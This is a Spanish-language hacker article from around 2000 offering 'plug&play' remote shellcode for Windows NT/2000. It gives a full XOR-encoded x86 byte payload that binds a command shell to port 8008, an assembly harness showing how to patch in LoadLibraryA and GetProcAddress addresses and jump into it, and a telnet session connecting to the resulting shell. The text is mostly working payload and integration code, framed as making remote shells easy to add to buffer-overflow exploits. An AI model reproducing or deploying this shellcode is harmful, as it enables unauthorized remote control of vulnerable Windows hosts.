	___________________________________________________________________


		       (c) 2000 DeepZone. All rights reserved.

		     _-=[ plug&play WinNT/2k remote shellcode ]=-_

                              by |Zan <izan@deepzone.org>

		http://www.deepzone.org - http://mareasvivas.cjb.net

	___________________________________________________________________


	
	Background
	__________

	En la actualidad el nmero de overflows apareciendo para el
	kernel NT se est convirtiendo en un autntico problema para
	administradores corriendo redes WinNT/2k.

	Desde que surgi la posibilidad de explotar con ciertos garantas
	este tipo de vulnerabilidad son muchos los que notifican nuevos
	b0fs acompaando sus avisos de algn tipo de cdigo en el cual
	se presuponen direcciones, ficheros y, en definitiva, un cierto
        entorno que no se tiene porque dar en un sistema remoto real.

	El problema surge si realmente fuese cdigo portable que
	cualquier hacker pudiese incluir de manera fcil y cmoda en
	su exploit ...


	Introduccin
	____________

	El presente texto no recorrer el principio de sobreescritura de
	la pila y control del flujo de programa que est detrs de un
	clsico desbordamiento de pila.

	Existen numerosos recursos en la red y bibliografa adecuada
	para comprender esto ltimo o documentarse sobre un punto en
	concreto. De todas formas, al final del documento, podrs
	encontrar los papeles ms extendidos acerca de stack-overflows
	y la teora presente detras de ellos [1]

	Los dos siguientes puntos en el documento muestran un shellcode
	portable para WinNT/2k que pondr una consola a la escucha en
	el puerto 8008 as como su integracin en un exploit genrico.


	plug&play shellcode
	___________________

	; -- begin x86/asm --

        LLB1    equ     (00h xor 99h)
        LLB2    equ     (00h xor 99h)
        LLB3    equ     (00h xor 99h)
        LLB4    equ     (00h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (00h xor 99h)
        GPB3    equ     (00h xor 99h)
        GPB4    equ     (00h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --


	howto ?
	_______

	El cdigo anterior ha sido diseado para trabajar en funcin de
	dos nicas direcciones de APIs que estn presentes en el 99% de
	los casos en un ejecutable de windows (GetProcAddress y
	LoadLibraryA).

	Estas dos direcciones, constantes para el mismo ejecutable,
	podremos suponerlas conocidas cuando generamos un b0f remoto y
	podremos hacer uso de ellas para abusar del servidor remoto.

	En realidad, estas dos direcciones, son las direcciones a las que
	linkamos en la IT para saltar indirectamente a la autntica
	direccin absoluta de GetProcAddress y LoadLibraryA.

	Estas dos direcciones son fcilmente obtenibles a travs de un
	debugger o desensamblando el cdigo.

	Veamos el siguiente listado a modo de ejemplo ...


	; Tasm 5.0/x86

	.386p
	locals
	jumps
	.model flat, stdcall

	extrn LoadLibraryA:PROC
	extrn GetProcAddress:PROC
        extrn WSAStartup:PROC


	.data

        wsadescription_len equ 256
        wsasys_status_len equ 128

        WSAdata struct
                wVersion       dw ?
                wHighVersion   dw ?
                szDescription  db wsadescription_len+1 dup (?)
                szSystemStatus db wsasys_status_len+1  dup (?)
                iMaxSockets    dw ?
                iMaxUdpDg      dw ?
                lpVendorInfo   dw ?
        WSAdata ends
        wsadata WSAdata <?>

	__strKERNEL32		db	'KERNEL32', 0
	__strExitProcess	db	'ExitProcess', 0		

	
	; -- begin x86/asm --

        LLB1    equ     (00h xor 99h)
        LLB2    equ     (40h xor 99h)
        LLB3    equ     (30h xor 99h)
        LLB4    equ     (50h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (40h xor 99h)
        GPB3    equ     (30h xor 99h)
        GPB4    equ     (54h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --
	

	.code

	start:
		
		push    offset wsadata
		push    0101h
		call    WSAStartup

                jmp     DeepZone_w32ShellCode	; Secuestramos el flujo
						
		push	offset	__strKERNEL32
		call	LoadLibraryA
		push	offset	__strExitProcess
		push	eax
                call    GetProcAddress
		push	0
		call	eax
	
	end start


	El cdigo anterior obtiene dinmicamente la direccin de
	ExitProcess y termina su ejecucin con un valor de retorno 0
	ignorando el shellcode si el salto incondicional no es
	ejecutado.

	Por otro lado, si el salto incondicional es ejecutado el
	shellcode toma el control.

	Se ha incluido la inicializacin de WinSock en las tres
	primeras lneas puesto que el servidor remoto en el que se
	generara el b0f ya ha sido inicializado cuando ocurre el b0f
	y el shell realmente no necesita volver a inicializar WinSock.

	Si inspeccionamos detenidamente el cdigo veremos que las
	llamadas a las APIs LoadLibraryA y GetProcAddress se hacen
	a travs de un salto indirecto ...

	LoadLibraryA     ----->   jmp dword ptr [00403050]
	GetProcAddress   ----->   jmp dword ptr [00403054]

	Las direcciones que estamos buscando son ...

	00403050 para LoadLibraryA y 00403054 para GetProcAddress.

	El shellcode ha sido xoreado con un valor de 99h para
	eliminar posibles nulos; por lo tanto, a la hora de almacenar
	las direcciones se debe tener en cuenta este detalle.
	
	En este punto aadimos estas dos direcciones xoreadas byte
	a byte e intentamos ejecutar el cdigo de test "simulando"
	un secuestro de flujo a travs de un salto incondicional
	contra el shellcode (el shellcode estara almacenado en
	el stack en el caso de un b0f real).

	Comprobemos que disponemos de una consola remota ...

	$ uname
	Linux

	$ telnet mana.mareas.deepzone.org 8008
	Trying 192.168.14.34...
	Connected to mana.mareas.deepzone.org.
	Escape character is '^]'.

